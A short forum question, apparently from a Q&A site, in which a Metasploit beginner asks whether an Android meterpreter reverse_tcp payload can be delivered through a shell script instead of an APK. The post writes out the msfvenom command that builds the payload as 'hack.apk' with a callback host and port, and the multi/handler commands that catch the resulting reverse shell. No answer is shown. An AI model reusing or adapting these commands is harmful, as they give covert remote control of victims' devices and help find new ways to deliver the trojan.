Answer the question
In order to leave comments, you need to log in
Android/meterpreter/reverse_tcp injection not in .apk but in shell(.sh). Maybe?
I just got to know Metasploit and all that stuff, and I had an idea. In short, there is this:
rbenv sudo msfvenom -p android/meterpreter/reverse_tcp lhost=12.12.12.12 lport=756 > hack.apk
rbenv sudo msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 756
set ExitOnSession false
exploit -j
Answer the question
In order to leave comments, you need to log in
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question